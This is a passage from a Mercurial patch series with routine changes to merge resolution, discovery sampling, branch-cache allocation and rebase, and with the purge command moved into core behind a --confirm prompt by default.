a/tests/test-resolve.t b/tests/test-resolve.t --- a/tests/test-resolve.t +++ b/tests/test-resolve.t @@ -344,6 +344,24 @@ $ hg resolve -l R file1 R file2 +Test with :mergediff conflict markers + $ hg resolve --unmark + $ hg resolve --re-merge -t :mergediff file2 + merging file2 + warning: conflicts while merging file2! (edit, then use 'hg resolve --mark') + [1] + $ hg resolve -l + U file1 + U file2 + $ hg --config commands.resolve.mark-check=abort resolve -m + warning: the following files still have conflict markers: + file2 + abort: conflict markers detected + (use --all to mark anyway) + [20] + $ hg resolve -l + U file1 + U file2 Test option value 'warn' $ hg resolve --unmark $ hg resolve -l # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1611011919 -3600 # Tue Jan 19 00:18:39 2021 +0100 # Node ID 72f5280e33b6c3ec621ca33e2ac3de982e20a00a # Parent 0c95b59a89f17aabb202e1f1502b311f6b854d3b commit: look-up new revision once Look-up by node is slightly more expensive, so since it is necessary more than once, do it explicitly. Differential Revision: https://phab.mercurial-scm.org/D9830 diff --git a/mercurial/commit.py b/mercurial/commit.py --- a/mercurial/commit.py +++ b/mercurial/commit.py @@ -96,6 +96,7 @@ ctx.date(), extra, ) + rev = repo[n].rev() xp1, xp2 = p1.hex(), p2 and p2.hex() or b'' repo.hook( b'pretxncommit', @@ -108,7 +109,7 @@ targetphase = subrepoutil.newcommitphase(repo.ui, ctx) # prevent unmarking changesets as public on recommit - waspublic = oldtip == repo.changelog.tiprev() and not repo[n].phase() + waspublic = oldtip == repo.changelog.tiprev() and not repo[rev].phase() if targetphase and not waspublic: # retract boundary do not alter parent changeset. @@ -116,7 +117,7 @@ # be compliant anyway # # if minimal phase was 0 we don't need to retract anything - phases.registernew(repo, tr, targetphase, [repo[n].rev()]) + phases.registernew(repo, tr, targetphase, [rev]) return n # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1611012042 -3600 # Tue Jan 19 00:20:42 2021 +0100 # Node ID 009130064813065868050fadf40b2575ad815be2 # Parent 72f5280e33b6c3ec621ca33e2ac3de982e20a00a exchangev2: avoid second look-up by node Accessing the revlog by node is slightly more expensive than by revision, so look up the revision first and use it afterwards. Differential Revision: https://phab.mercurial-scm.org/D9831 diff --git a/mercurial/exchangev2.py b/mercurial/exchangev2.py --- a/mercurial/exchangev2.py +++ b/mercurial/exchangev2.py @@ -364,12 +364,13 @@ def onchangeset(cl, node): progress.increment() - revision = cl.changelogrevision(node) + rev = cl.rev(node) + revision = cl.changelogrevision(rev) added.append(node) # We need to preserve the mapping of changelog revision to node # so we can set the linkrev accordingly when manifests are added. - manifestnodes[cl.rev(node)] = revision.manifest + manifestnodes[rev] = revision.manifest nodesbyphase = {phase: set() for phase in phases.phasenames.values()} remotebookmarks = {} # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1610922093 -3600 # Sun Jan 17 23:21:33 2021 +0100 # Node ID 0600e8467101567d8007ad7e64d71d3cb7d26baa # Parent 009130064813065868050fadf40b2575ad815be2 discovery: add config options to control sample size This get useful for running analysis of the current algorithm. Differential Revision: https://phab.mercurial-scm.org/D9813 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -729,6 +729,18 @@ b'discovery.randomize', default=True, ) +# Control the initial size of the discovery sample +coreconfigitem( + b'devel', + b'discovery.sample-size', + default=200, +) +# Control the initial size of the discovery for initial change +coreconfigitem( + b'devel', + b'discovery.sample-size.initial', + default=100, +) _registerdiffopts(section=b'diff') coreconfigitem( b'email', diff --git a/mercurial/setdiscovery.py b/mercurial/setdiscovery.py --- a/mercurial/setdiscovery.py +++ b/mercurial/setdiscovery.py @@ -286,8 +286,6 @@ ui, local, remote, - initialsamplesize=100, - fullsamplesize=200, abortwhenunrelated=True, ancestorsof=None, audit=None, @@ -315,7 +313,8 @@ ownheads = [rev for rev in cl.headrevs() if rev != nullrev] initial_head_exchange = ui.configbool(b'devel', b'discovery.exchange-heads') - + initialsamplesize = ui.configint(b'devel', b'discovery.sample-size.initial') + fullsamplesize = ui.configint(b'devel', b'discovery.sample-size') # We also ask remote about all the local heads. That set can be arbitrarily # large, so we used to limit it size to `initialsamplesize`. We no longer # do as it proved counter productive. The skipped heads could lead to a diff --git a/tests/test-setdiscovery.t b/tests/test-setdiscovery.t --- a/tests/test-setdiscovery.t +++ b/tests/test-setdiscovery.t @@ -1328,25 +1328,25 @@ updating to branch b 0 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg -R a debugdiscovery b --debug --verbose --config progress.debug=true --config devel.discovery.randomize=false + $ hg -R a debugdiscovery b --debug --verbose --config progress.debug=true --config devel.discovery.randomize=false --config devel.discovery.sample-size.initial=50 comparing with b query 1; heads searching for changes taking quick initial sample searching: 2 queries - query 2; still undecided: 1080, sample size is: 100 + query 2; still undecided: 1080, sample size is: 50 sampling from both directions searching: 3 queries - query 3; still undecided: 980, sample size is: 200 + query 3; still undecided: 1030, sample size is: 200 sampling from both directions searching: 4 queries - query 4; still undecided: 497, sample size is: 210 + query 4; still undecided: 547, sample size is: 210 sampling from both directions searching: 5 queries - query 5; still undecided: 285, sample size is: 220 + query 5; still undecided: 336, sample size is: 220 sampling from both directions searching: 6 queries - query 6; still undecided: 63, sample size is: 63 + query 6; still undecided: 114, sample size is: 114 6 total queries in *.????s (glob) elapsed time: * seconds (glob) round-trips: 6 @@ -1412,22 +1412,30 @@ missing: 1040 common heads: 3ee37d65064a - $ hg -R a debugdiscovery b --debug --config devel.discovery.exchange-heads=false --config devel.discovery.randomize=false --config devel.discovery.grow-sample.rate=1.01 + $ hg -R a debugdiscovery b --debug --config devel.discovery.exchange-heads=false --config devel.discovery.randomize=false --config devel.discovery.grow-sample.rate=1.20 --config devel.discovery.sample-size=50 comparing with b searching for changes sampling from both directions - query 1; still undecided: 1340, sample size is: 200 + query 1; still undecided: 1340, sample size is: 50 + sampling from both directions + query 2; still undecided: 995, sample size is: 60 sampling from both directions - query 2; still undecided: 795, sample size is: 202 + query 3; still undecided: 913, sample size is: 72 sampling from both directions - query 3; still undecided: 525, sample size is: 204 + query 4; still undecided: 816, sample size is: 204 + sampling from both directions + query 5; still undecided: 612, sample size is: 153 sampling from both directions - query 4; still undecided: 252, sample size is: 206 + query 6; still undecided: 456, sample size is: 123 + sampling from both directions + query 7; still undecided: 332, sample size is: 147 sampling from both directions - query 5; still undecided: 44, sample size is: 44 - 5 total queries in *s (glob) - elapsed time: * seconds (glob) - round-trips: 5 + query 8; still undecided: 184, sample size is: 176 + sampling from both directions + query 9; still undecided: 8, sample size is: 8 + 9 total queries in *s (glob) + elapsed time: * seconds (glob) + round-trips: 9 heads summary: total common heads: 1 also local heads: 0 # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1610670047 -3600 # Fri Jan 15 01:20:47 2021 +0100 # Node ID 1726a53a84942fca15a7edab4cb1eb8389908c5c # Parent 0600e8467101567d8007ad7e64d71d3cb7d26baa reverse-branch-cache: switch to doubling allocating scheme In preperation for updating the reverse-branch-cache incrementally whenever a new changeset comes in, avoid bad performance on resize with Python 3.7 (and likely other 3.x versions). Differential Revision: https://phab.mercurial-scm.org/D9778 diff --git a/mercurial/branchmap.py b/mercurial/branchmap.py --- a/mercurial/branchmap.py +++ b/mercurial/branchmap.py @@ -566,6 +566,7 @@ # [4 byte hash prefix][4 byte branch name number with sign bit indicating open] _rbcrecfmt = b'>4sI' _rbcrecsize = calcsize(_rbcrecfmt) +_rbcmininc = 64 * _rbcrecsize _rbcnodelen = 4 _rbcbranchidxmask = 0x7FFFFFFF _rbccloseflag = 0x80000000 @@ -730,11 +731,15 @@ if rev == nullrev: return rbcrevidx = rev * _rbcrecsize - if len(self._rbcrevs) < rbcrevidx + _rbcrecsize: - self._rbcrevs.extend( - b'\0' - * (len(self._repo.changelog) * _rbcrecsize - len(self._rbcrevs)) - ) + requiredsize = rbcrevidx + _rbcrecsize + rbccur = len(self._rbcrevs) + if rbccur < requiredsize: + # bytearray doesn't allocate extra space at least in Python 3.7. + # When multiple changesets are added in a row, precise resize would + # result in quadratic complexity. Overallocate to compensate by + # use the classic doubling technique for dynamic arrays instead. + # If there was a gap in the map before, less space will be reserved. + self._rbcrevs.extend(b'\0' * max(_rbcmininc, requiredsize)) pack_into(_rbcrecfmt, self._rbcrevs, rbcrevidx, node, branchidx) self._rbcrevslen = min(self._rbcrevslen, rev) # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1589837393 14400 # Mon May 18 17:29:53 2020 -0400 # Node ID dfca84970da846f3849ee464546f90b637f50852 # Parent 1726a53a84942fca15a7edab4cb1eb8389908c5c cleanup: use mergestate.unresolvedcount() instead of bool(list(unresolved())) This avoids some pointless copying. Differential Revision: https://phab.mercurial-scm.org/D8566 diff --git a/hgext/fix.py b/hgext/fix.py --- a/hgext/fix.py +++ b/hgext/fix.py @@ -433,8 +433,9 @@ if not (len(revs) == 1 and wdirrev in revs): cmdutil.checkunfinished(repo) rewriteutil.precheck(repo, revs, b'fix') - if wdirrev in revs and list( - mergestatemod.mergestate.read(repo).unresolved() + if ( + wdirrev in revs + and mergestatemod.mergestate.read(repo).unresolvedcount() ): raise error.Abort(b'unresolved conflicts', hint=b"use 'hg resolve'") if not revs: diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -6082,7 +6082,7 @@ if hint: ui.warn(hint) - unresolvedf = list(ms.unresolved()) + unresolvedf = ms.unresolvedcount() if not unresolvedf: ui.status(_(b'(no more unresolved files)\n')) cmdutil.checkafterresolved(repo) diff --git a/mercurial/merge.py b/mercurial/merge.py --- a/mercurial/merge.py +++ b/mercurial/merge.py @@ -1920,7 +1920,7 @@ if len(pl) > 1: raise error.Abort(_(b"outstanding uncommitted merge")) ms = wc.mergestate() - if list(ms.unresolved()): + if ms.unresolvedcount(): raise error.Abort( _(b"outstanding merge conflicts"), hint=_(b"use 'hg resolve' to resolve"), diff --git a/mercurial/mergeutil.py b/mercurial/mergeutil.py --- a/mercurial/mergeutil.py +++ b/mercurial/mergeutil.py @@ -13,7 +13,7 @@ def checkunresolved(ms): - if list(ms.unresolved()): + if ms.unresolvedcount(): raise error.StateError( _(b"unresolved merge conflicts (see 'hg help resolve')") ) diff --git a/mercurial/shelve.py b/mercurial/shelve.py --- a/mercurial/shelve.py +++ b/mercurial/shelve.py @@ -812,7 +812,7 @@ with repo.lock(): checkparents(repo, state) ms = mergestatemod.mergestate.read(repo) - if list(ms.unresolved()): + if ms.unresolvedcount(): raise error.Abort( _(b"unresolved conflicts, can't continue"), hint=_(b"see 'hg resolve', then 'hg unshelve --continue'"), # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1590701501 14400 # Thu May 28 17:31:41 2020 -0400 # Node ID 24a32dea69557bdacfd650c7b586f8dd35860212 # Parent dfca84970da846f3849ee464546f90b637f50852 rebase: add a config knob for forcing in-memory rebasing Use it in a test case where we know the rebase should proceed without incident in-memory, so we can see tracebacks rather than fallbacks. This makes it easier to try and debug when things are broken. Differential Revision: https://phab.mercurial-scm.org/D8623 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -67,6 +67,14 @@ cmdtable = {} command = registrar.command(cmdtable) + +configtable = {} +configitem = registrar.configitem(configtable) +configitem( + b'devel', + b'rebase.force-in-memory-merge', + default=False, +) # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should # be specifying the version(s) of Mercurial they are tested with, or @@ -1112,6 +1120,8 @@ with ui.configoverride(overrides, b'rebase'): return _dorebase(ui, repo, action, opts, inmemory=inmemory) except error.InMemoryMergeConflictsError: + if ui.configbool(b'devel', b'rebase.force-in-memory-merge'): + raise ui.warn( _( b'hit merge conflicts; re-running rebase without in-memory' diff --git a/tests/test-copies-in-changeset.t b/tests/test-copies-in-changeset.t --- a/tests/test-copies-in-changeset.t +++ b/tests/test-copies-in-changeset.t @@ -345,7 +345,10 @@ $ hg co -q 0 $ hg mv a b $ hg ci -qm 'rename a to b' - $ hg rebase -d 1 --config rebase.experimental.inmemory=yes +Not only do we want this to run in-memory, it shouldn't fall back to +on-disk merge (no conflicts), so we force it to be in-memory +with no fallback. + $ hg rebase -d 1 --config rebase.experimental.inmemory=yes --config devel.rebase.force-in-memory-merge=yes rebasing 2:* tip "rename a to b" (glob) merging a and b to b saved backup bundle to $TESTTMP/rebase-rename/.hg/strip-backup/*-*-rebase.hg (glob) # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1589237145 14400 # Mon May 11 18:45:45 2020 -0400 # Node ID 63dfaca9087f47b5991dcc702696940497b6eeb3 # Parent 24a32dea69557bdacfd650c7b586f8dd35860212 filemerge: add a hacktastic version of internal:merge3 for merge diffs This is a version of merge3 that always reports success, so that conflict markers get preserved without us having to implement conflict storage for in-memory merge. Credit to martinvonz for the idea. The only planned consumer of this "merge tool" is my upcoming merge-diffs functionality, though I suspect it could be useful in other ways. Differential Revision: https://phab.mercurial-scm.org/D8515 diff --git a/mercurial/filemerge.py b/mercurial/filemerge.py --- a/mercurial/filemerge.py +++ b/mercurial/filemerge.py @@ -538,6 +538,25 @@ @internaltool( + b'merge3-lie-about-conflicts', + fullmerge, + b'', + precheck=_mergecheck, +) +def _imerge3alwaysgood(*args, **kwargs): + # Like merge3, but record conflicts as resolved with markers in place. + # + # This is used for `hg diff --merge` to show the differences between + # the auto-merge state and the committed merge state. It may be + # useful for other things. + b1, junk, b2 = _imerge3(*args, **kwargs) + # TODO is this right? I'm not sure what these return values mean, + # but as far as I can tell this will indicate to callers tha the + # merge succeeded. + return b1, False, b2 + + +@internaltool( b'mergediff', fullmerge, _( # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1610961843 -3600 # Mon Jan 18 10:24:03 2021 +0100 # Node ID 135056e8b5a8c6261e16fbd040f99aefec08e3f9 # Parent 63dfaca9087f47b5991dcc702696940497b6eeb3 purge: add a --confirm option The options provide a prompt to the user before permanent deletion are made. The prompt is currently not aware of directory deletion. I'll fix this in the next changesets. Differential Revision: https://phab.mercurial-scm.org/D9818 diff --git a/hgext/purge.py b/hgext/purge.py --- a/hgext/purge.py +++ b/hgext/purge.py @@ -61,6 +61,7 @@ b' (implies -p/--print)' ), ), + (b'', b'confirm', None, _(b'ask before permanently deleting files')), ] + cmdutil.walkopts, _(b'hg purge [OPTION]... [DIR]...'), @@ -113,6 +114,7 @@ removefiles = opts.get(b'files') removedirs = opts.get(b'dirs') + confirm = opts.get(b'confirm') if not removefiles and not removedirs: removefiles = True @@ -129,6 +131,7 @@ removefiles=removefiles, abortonerror=opts.get(b'abort_on_err'), noop=not act, + confirm=confirm, ) for path in paths: diff --git a/mercurial/merge.py b/mercurial/merge.py --- a/mercurial/merge.py +++ b/mercurial/merge.py @@ -2324,6 +2324,7 @@ removefiles=True, abortonerror=False, noop=False, + confirm=False, ): """Purge the working directory of untracked files. @@ -2344,6 +2345,8 @@ ``noop`` controls whether to actually remove files. If not defined, actions will be taken. + ``confirm`` ask confirmation before actually removing anything. + Returns an iterable of relative paths in the working directory that were or would be removed. """ @@ -2371,6 +2374,25 @@ status = repo.status(match=matcher, ignored=ignored, unknown=unknown) + if confirm: + nb_ignored = len(status.ignored) + nb_unkown = len(status.unknown) + if nb_unkown and nb_ignored: + msg = _(b"permanently delete %d unkown and %d ignored files?") + msg %= (nb_unkown, nb_ignored) + elif nb_unkown: + msg = _(b"permanently delete %d unkown files?") + msg %= nb_unkown + elif nb_ignored: + msg = _(b"permanently delete %d ignored files?") + msg %= nb_ignored + else: + # XXX we might be missing directory there + return res + msg += b" (yN)$$ &Yes $$ &No" + if repo.ui.promptchoice(msg, default=1) == 1: + raise error.CanceledError(_(b'removal cancelled')) + if removefiles: for f in sorted(status.unknown + status.ignored): if not noop: diff --git a/tests/test-purge.t b/tests/test-purge.t --- a/tests/test-purge.t +++ b/tests/test-purge.t @@ -62,6 +62,10 @@ $ hg purge -p untracked_file untracked_file_readonly + $ hg purge --confirm + permanently delete 2 unkown files? (yN) n + abort: removal cancelled + [250] $ hg purge -v removing file untracked_file removing file untracked_file_readonly @@ -121,6 +125,10 @@ $ cd directory $ hg purge -p ../untracked_directory untracked_directory/nested_directory + $ hg purge --confirm + permanently delete 1 unkown files? (yN) n + abort: removal cancelled + [250] $ hg purge -v ../untracked_directory removing directory untracked_directory/nested_directory removing directory untracked_directory @@ -138,6 +146,7 @@ $ touch ignored $ hg purge -p + $ hg purge --confirm $ hg purge -v $ touch untracked_file $ ls @@ -147,6 +156,10 @@ untracked_file $ hg purge -p -i ignored + $ hg purge --confirm -i + permanently delete 1 ignored files? (yN) n + abort: removal cancelled + [250] $ hg purge -v -i removing file ignored $ ls -A @@ -159,6 +172,10 @@ $ hg purge -p --all ignored untracked_file + $ hg purge --confirm --all + permanently delete 1 unkown and 1 ignored files? (yN) n + abort: removal cancelled + [250] $ hg purge -v --all removing file ignored removing file untracked_file # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1610961851 -3600 # Mon Jan 18 10:24:11 2021 +0100 # Node ID 57370e7deb7b4c9d470c542febbae30b3f40e1f7 # Parent 135056e8b5a8c6261e16fbd040f99aefec08e3f9 purge: also deal with directory with --confirm Getting the exact number is simple (you have to project the result of previous deletion to detect super-directory with only about-to-be-deleted content). So we use a vaguer message. Differential Revision: https://phab.mercurial-scm.org/D9819 diff --git a/mercurial/merge.py b/mercurial/merge.py --- a/mercurial/merge.py +++ b/mercurial/merge.py @@ -2386,9 +2386,19 @@ elif nb_ignored: msg = _(b"permanently delete %d ignored files?") msg %= nb_ignored - else: - # XXX we might be missing directory there - return res + elif removeemptydirs: + dir_count = 0 + for f in directories: + if matcher(f) and not repo.wvfs.listdir(f): + dir_count += 1 + if dir_count: + msg = _( + b"permanently delete at least %d empty directories?" + ) + msg %= dir_count + else: + # XXX we might be missing directory there + return res msg += b" (yN)$$ &Yes $$ &No" if repo.ui.promptchoice(msg, default=1) == 1: raise error.CanceledError(_(b'removal cancelled')) diff --git a/tests/test-purge.t b/tests/test-purge.t --- a/tests/test-purge.t +++ b/tests/test-purge.t @@ -23,6 +23,10 @@ $ mkdir empty_dir $ hg purge -p -v empty_dir + $ hg purge --confirm + permanently delete at least 1 empty directories? (yN) n + abort: removal cancelled + [250] $ hg purge -v removing directory empty_dir $ ls -A # HG changeset patch # User Valentin Gatien-Baron <valentin.gatienbaron@gmail.com> # Date 1610961860 -3600 # Mon Jan 18 10:24:20 2021 +0100 # Node ID bb3a5c0df06b2cb1bc3a01b850d69113d9818f5f # Parent 57370e7deb7b4c9d470c542febbae30b3f40e1f7 purge: move extension into core mercurial The motivation is simple: it's nicer to avoid gating basic functionality. To reduce the risk of people shooting themselves in the feet, `--confirm` is now the default, unless the extensions is loaded.. For review of the body of the purge command, use this instead of what hg/phabricator will show (the block of code is modified, not just moved): Differential Revision: https://phab.mercurial-scm.org/D9820 diff --git a/hgext/largefiles/overrides.py b/hgext/largefiles/overrides.py --- a/hgext/largefiles/overrides.py +++ b/hgext/largefiles/overrides.py @@ -1567,7 +1567,7 @@ # Calling purge with --all will cause the largefiles to be deleted. # Override repo.status to prevent this from happening. -@eh.wrapcommand(b'purge', extension=b'purge') +@eh.wrapcommand(b'purge') def overridepurge(orig, ui, repo, *dirs, **opts): # XXX Monkey patching a repoview will not work. The assigned attribute will # be set on the unfiltered repo, but we will only lookup attributes in the diff --git a/hgext/purge.py b/hgext/purge.py --- a/hgext/purge.py +++ b/hgext/purge.py @@ -22,118 +22,11 @@ # You should have received a copy of the GNU General Public License # along with this program; if not, see <http://www.gnu.org/licenses/>. -'''command to delete untracked files from the working directory''' -from __future__ import absolute_import - -from mercurial.i18n import _ -from mercurial import ( - cmdutil, - merge as mergemod, - pycompat, - registrar, - scmutil, -) - -cmdtable = {} -command = registrar.command(cmdtable) -# Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for -# extensions which SHIP WITH MERCURIAL. Non-mainline extensions should -# be specifying the version(s) of Mercurial they are tested with, or -# leave the attribute unspecified. -testedwith = b'ships-with-hg-core' - - -@command( - b'purge|clean', - [ - (b'a', b'abort-on-err', None, _(b'abort if an error occurs')), - (b'', b'all', None, _(b'purge ignored files too')), - (b'i', b'ignored', None, _(b'purge only ignored files')), - (b'', b'dirs', None, _(b'purge empty directories')), - (b'', b'files', None, _(b'purge files')), - (b'p', b'print', None, _(b'print filenames instead of deleting them')), - ( - b'0', - b'print0', - None, - _( - b'end filenames with NUL, for use with xargs' - b' (implies -p/--print)' - ), - ), - (b'', b'confirm', None, _(b'ask before permanently deleting files')), - ] - + cmdutil.walkopts, - _(b'hg purge [OPTION]... [DIR]...'), - helpcategory=command.CATEGORY_WORKING_DIRECTORY, -) -def purge(ui, repo, *dirs, **opts): - """removes files not tracked by Mercurial - - Delete files not known to Mercurial. This is useful to test local - and uncommitted changes in an otherwise-clean source tree. - - This means that purge will delete the following by default: - - - Unknown files: files marked with "?" by :hg:`status` - - Empty directories: in fact Mercurial ignores directories unless - they contain files under source control management +'''command to delete untracked files from the working directory (DEPRECATED) - But it will leave untouched: - - - Modified and unmodified tracked files - - Ignored files (unless -i or --all is specified) - - New files added to the repository (with :hg:`add`) - - The --files and --dirs options can be used to direct purge to delete - only files, only directories, or both. If neither option is given, - both will be deleted. - - If directories are given on the command line, only files in these - directories are considered. - - Be careful with purge, as you could irreversibly delete some files - you forgot to add to the repository. If you only want to print the - list of files that this program would delete, use the --print - option. - """ - opts = pycompat.byteskwargs(opts) - cmdutil.check_at_most_one_arg(opts, b'all', b'ignored') +The functionality of this extension has been included in core Mercurial since +version 5.7. Please use :hg:`purge ...` instead. :hg:`purge --confirm` is now the default, unless the extension is enabled for backward compatibility. +''' - act = not opts.get(b'print') - eol = b'\n' - if opts.get(b'print0'): - eol = b'\0' - act = False # --print0 implies --print - if opts.get(b'all', False): - ignored = True - unknown = True - else: - ignored = opts.get(b'ignored', False) - unknown = not ignored - - removefiles = opts.get(b'files') - removedirs = opts.get(b'dirs') - confirm = opts.get(b'confirm') - - if not removefiles and not removedirs: - removefiles = True - removedirs = True - - match = scmutil.match(repo[None], dirs, opts) - - paths = mergemod.purge( - repo, - match, - unknown=unknown, - ignored=ignored, - removeemptydirs=removedirs, - removefiles=removefiles, - abortonerror=opts.get(b'abort_on_err'), - noop=not act, - confirm=confirm, - ) - - for path in paths: - if not act: - ui.write(b'%s%s' % (path, eol)) +# This empty extension looks pointless, but core mercurial checks if it's loaded +# to implement the slightly different behavior documented above. diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -5447,6 +5447,108 @@ @command( + b'purge|clean', + [ + (b'a', b'abort-on-err', None, _(b'abort if an error occurs')), + (b'', b'all', None, _(b'purge ignored files too')), + (b'i', b'ignored', None, _(b'purge only ignored files')), + (b'', b'dirs', None, _(b'purge empty directories')), + (b'', b'files', None, _(b'purge files')), + (b'p', b'print', None, _(b'print filenames instead of deleting them')), + ( + b'0', + b'print0', + None, + _( + b'end filenames with NUL, for use with xargs' + b' (implies -p/--print)' + ), + ), + (b'', b'confirm', None, _(b'ask before permanently deleting files')), + ] + + cmdutil.walkopts, + _(b'hg purge [OPTION]... [DIR]...'), + helpcategory=command.CATEGORY_WORKING_DIRECTORY, +) +def purge(ui, repo, *dirs, **opts): + """removes files not tracked by Mercurial + + Delete files not known to Mercurial. This is useful to test local + and uncommitted changes in an otherwise-clean source tree. + + This means that purge will delete the following by default: + + - Unknown files: files marked with "?" by :hg:`status` + - Empty directories: in fact Mercurial ignores directories unless + they contain files under source control management + + But it will leave untouched: + + - Modified and unmodified tracked files + - Ignored files (unless -i or --all is specified) + - New files added to the repository (with :hg:`add`) + + The --files and --dirs options can be used to direct purge to delete + only files, only directories, or both. If neither option is given, + both will be deleted. + + If directories are given on the command line, only files in these + directories are considered. + + Be careful with purge, as you could irreversibly delete some files + you forgot to add to the repository. If you only want to print the + list of files that this program would delete, use the --print + option. + """ + opts = pycompat.byteskwargs(opts) + cmdutil.check_at_most_one_arg(opts, b'all', b'ignored') + + act = not opts.get(b'print') + eol = b'\n' + if opts.get(b'print0'): + eol = b'\0' + act = False # --print0 implies --print + if opts.get(b'all', False): + ignored = True + unknown = True + else: + ignored = opts.get(b'ignored', False) + unknown = not ignored + + removefiles = opts.get(b'files') + removedirs = opts.get(b'dirs') + confirm = opts.get(b'confirm') + if confirm is None: + try: + extensions.find(b'purge') + confirm = False + except KeyError: + confirm = True + + if not removefiles and not removedirs: + removefiles = True + removedirs = True + + match = scmutil.match(repo[None], dirs, opts) + + paths = mergemod.purge( + repo, + match, + unknown=unknown, + ignored=ignored, + removeemptydirs=removedirs, + removefiles=removefiles, + abortonerror=opts.get(b'abort_on_err'), + noop=not act, + confirm=confirm, + ) + + for path in paths: + if not act: + ui.write(b'%s%s' % (path, eol)) + + +@command( b'push', [ (b'f', b'force', None, _(b'force push')), diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -17,6 +17,8 @@ can be e.g. `rebase`. As part of this effort, the default format from `hg rebase` was reorganized a bit. + * `hg purge` is now a core command using `--confirm` by default. + * `hg strip`, from the strip extension, is now a core command, `hg debugstrip`. The extension remains for compatibility. diff --git a/tests/test-completion.t b/tests/test-completion.t --- a/tests/test-completion.t +++ b/tests/test-completion.t @@ -38,6 +38,7 @@ paths phase pull + purge push recover remove @@ -354,6 +355,7 @@ paths: template phase: public, draft, secret, force, rev pull: update, force, confirm, rev, bookmark, branch, ssh, remotecmd, insecure + purge: abort-on-err, all, ignored, dirs, files, print, print0, confirm, include, exclude push: force, rev, bookmark, all-bookmarks, branch, new-branch, pushvars, publish, ssh, remotecmd, insecure recover: verify remove: after, force, subrepos, include, exclude, dry-run diff --git a/tests/test-globalopts.t b/tests/test-globalopts.t --- a/tests/test-globalopts.t +++ b/tests/test-globalopts.t @@ -351,6 +351,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files @@ -483,6 +484,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files diff --git a/tests/test-help-hide.t b/tests/test-help-hide.t --- a/tests/test-help-hide.t +++ b/tests/test-help-hide.t @@ -55,6 +55,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files @@ -191,6 +192,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files diff --git a/tests/test-help.t b/tests/test-help.t --- a/tests/test-help.t +++ b/tests/test-help.t @@ -107,6 +107,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files @@ -235,6 +236,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files @@ -375,8 +377,6 @@ mq manage a stack of patches notify hooks for sending email push notifications patchbomb command to send changesets as (a series of) patch emails - purge command to delete untracked files from the working - directory relink recreates hardlinks between repository clones schemes extend schemes with shortcuts to repository swarms share share a common history between several working directories @@ -2720,6 +2720,13 @@ set or show the current phase name </td></tr> <tr><td> + <a href="/help/purge"> + purge + </a> + </td><td> + removes files not tracked by Mercurial + </td></tr> + <tr><td> <a href="/help/recover"> recover </a> diff --git a/tests/test-hgweb-json.t b/tests/test-hgweb-json.t --- a/tests/test-hgweb-json.t +++ b/tests/test-hgweb-json.t @@ -2190,6 +2190,10 @@ "topic": "phase" }, { + "summary": "removes files not tracked by Mercurial", + "topic": "purge" + }, + { "summary": "roll back an interrupted transaction", "topic": "recover" }, diff --git a/tests/test-purge.t b/tests/test-purge.t --- a/tests/test-purge.t +++ b/tests/test-purge.t @@ -1,8 +1,3 @@ - $ cat <<EOF >> $HGRCPATH - > [extensions] - > purge = - > EOF - init $ hg init t @@ -18,6 +13,26 @@ $ echo 'ignored' > .hgignore $ hg ci -qAmr3 -d'2 0' +purge without the extension + + $ hg st + $ touch foo + $ hg purge + permanently delete 1 unkown files? (yN) n + abort: removal cancelled + [250] + $ hg st + ? foo + $ hg purge --no-confirm + $ hg st + +now enabling the extension + + $ cat <<EOF >> $HGRCPATH + > [extensions] + > purge = + > EOF + delete an empty directory $ mkdir empty_dir # HG changeset patch # User Dan Villiom Podlaski Christiansen <danchr@gmail.com> # Date 1611310239 -3600 # Fri Jan 22 11:10:39 2021 +0100 # Node ID cabc5e9366c55ac4c446e474f00dd593dd5e5816 # Parent bb3a5c0df06b2cb1bc3a01b850d69113d9818f5f rust: lower compile error on non-linux platforms to a warning As discussed on D9671#146704 this lowers the error to a warning. Differential Revision: https://phab.mercurial-scm.org/D9852 diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -30,14 +30,6 @@ pub mod operations; pub mod utils; -// Remove this to see (potential) non-artificial compile failures. MacOS -// *should* compile, but fail to compile tests for example as of 